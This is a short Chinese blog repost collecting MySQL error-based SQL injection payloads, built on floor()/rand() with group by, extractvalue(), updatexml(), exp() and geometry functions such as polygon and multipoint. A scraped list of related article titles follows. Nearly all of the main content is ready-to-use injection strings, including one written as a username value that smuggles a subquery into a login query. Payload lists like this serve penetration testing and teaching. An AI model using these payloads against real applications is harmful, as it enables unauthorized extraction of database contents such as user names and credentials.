1、floor()函数

原理:

利用rand()函数与group()函数的相互冲突,floor()是向下取整函数,floor(9.99)=9.0

语法结构:

username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,你想获取的数据的sql语句)x from information_schema.tables group by x )a) and '1' = '1

2、extractvalue()函数

语法结构:

extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

concat中添加要查询的语句

3、updatexml()函数

语法结构:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、exp()函数

语法结构:

and EXP(~(SELECT * from(select user())a))

5、归类

GeometryCollection()

id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))

polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))

multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))

multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

转载于:https://www.cnblogs.com/ldsec/p/5792464.html

SQL--报错回显注入相关推荐

  1. 【漏洞发现-sql注入】有回显注入--sqli-labs

    一.漏洞描述 数据库是对用户数据进行存储以及删除等操作 ,功能是用来组织,存储和管理数据.比如我们网站每一个用户对应的用户名基本信息,账号密码等等,都在服务器用数据库保存.用户通过对网站的操作,请求返 ...

  2. 利用sql报错帮助进行sql注入

    我们可以利用sql报错帮助进行sql注入,这里以sql server 为例: sql查询时,若用group by子句时,该子句中的字段必须跟select 条件中的字段(非聚合函数)完全匹配,如果是se ...

  3. sql注入-回显注入实例详解

    根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748 本章主要对说明的内容通过实战的方式进一步加深,实战环境 ...

  4. 84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.高级注入技巧 dnslog无回显注入 1.原理 2.dnslog平台 3.MySQL dnslog无回显注入 ...

  5. Xshell安装sql报错:The GPG keys listed for the “MySQL 8.0 Community Server“ repository are already instal

    文章目录 Xshell安装sql报错:The GPG keys listed for the "MySQL 8.0 Community Server" repository are ...

  6. Xshell安装sql报错:······ RSA sha1 ((MD5) PGP) md5 NOT OK (MISSING KEYS: (MD5) PGP#3a79bd29)

    文章目录 Xshell安装sql报错:······ RSA sha1 ((MD5) PGP) md5 NOT OK (MISSING KEYS: (MD5) PGP#3a79bd29) 报错截图: 分 ...

  7. 数据库执行sql报错Got a packet bigger than 'max_allowed_packet' bytes及重启mysql

    准备在mysql上使用数据库A,但mysql5经过重装后,上面的数据库已丢失,只得通过之前备份的A.sql重新生成数据库A. 1.执行sql报错 在执行A.sql的过程中,出现如下错误:Got a p ...

  8. DB2 sql报错后查证原因与解决问题的方法

    DB2 sql报错后查证原因与解决问题的方法 参考文章: (1)DB2 sql报错后查证原因与解决问题的方法 (2)https://www.cnblogs.com/BradMiller/p/31978 ...

  9. 一篇文章让你解决sql报错check the manual that corresponds to your MySQL server version for the right syntax to

    一篇文章让你解决sql报错 反馈 因为这一个问题,找到了很多类似问题,你在看到这篇博客时,可能不是这个,但是一定是下面其中一个: Mysql错误:check the manual that corre ...

  10. mybatis-plus自定义sql报错 ew.customSqlSegment

    mybatis-plus自定义sql报错: org.mybatis.spring.MyBatisSystemException: nested exception is org.apache.ibat ...

最新文章

  1. 手机端适应_不轻易透露的超强技巧!详解iVX中怎样做设备自适应
  2. 07.十分钟学会tomcat数据源
  3. php终止脚本执行(exit、die、return)
  4. 11届蓝桥杯青少年组C++全国赛高级组 六.编程实现:求阶乘(python3实现)
  5. 打遍天下无敌手,却说它只是个baseline!多目标跟踪FairMOT的烦恼
  6. java面向对象数组_Java面向对象的构造器与数组对象
  7. Java性能调优小技巧
  8. python模块的使用方法_python中requests模块的使用方法
  9. Cannot set property ‘innerHTML‘ of null 问题的解决
  10. R语言建立VAR模型分析联合内生变量的动态关系
  11. 【软件使用】Macbook M1 QuickTime录屏讲解(只录电脑或者同时录电脑和麦克风人声)
  12. NodeJS 服务 Docker 镜像极致优化指北
  13. 求营业额占比 【问题描述】 从键盘输入学校附近某烧烤店某年每月的营业额,然后计算每月的营业额在年营业额中所占的百分比(四舍五入为整数,且不会超过全年的70%),并以样例输出所示的水平直方图形式
  14. python声音识别歌曲_听歌识曲--用python实现一个音乐检索器的功能
  15. Android调用系统相机拍照
  16. 华为发布海思麒麟950:神兽决斗跑分琅琊榜,麒麟压得过骁龙?---ESM
  17. python返回上一个交易日
  18. Unity中行星和恒星的旋转——Rotate和RotateAround
  19. dd命令安装Linux安装教程详细步骤
  20. 防垃圾邮件网关/防钓鱼邮件解决方案

热门文章

  1. CSS-----盒子模型
  2. [LeetCode] NO. 349 Intersection of Two Arrays
  3. 枚举报错   Syntax error on token enum, interface expected
  4. log4j-over-slf4j与slf4j-log4j12共存stack overflow异常
  5. 硬盘(U盘)被误格式化(删除),重要的文件如何恢复?
  6. 刷屏!马化腾:腾讯只是一家普通公司,随时可以被替换
  7. 程序员需知的 58 个网站!个个经典
  8. 你碰到过的最难调的 Bug 是什么?
  9. 大数据架构师必读的NoSQL建模技术
  10. 教你一招最屌的阅读开源项目的姿势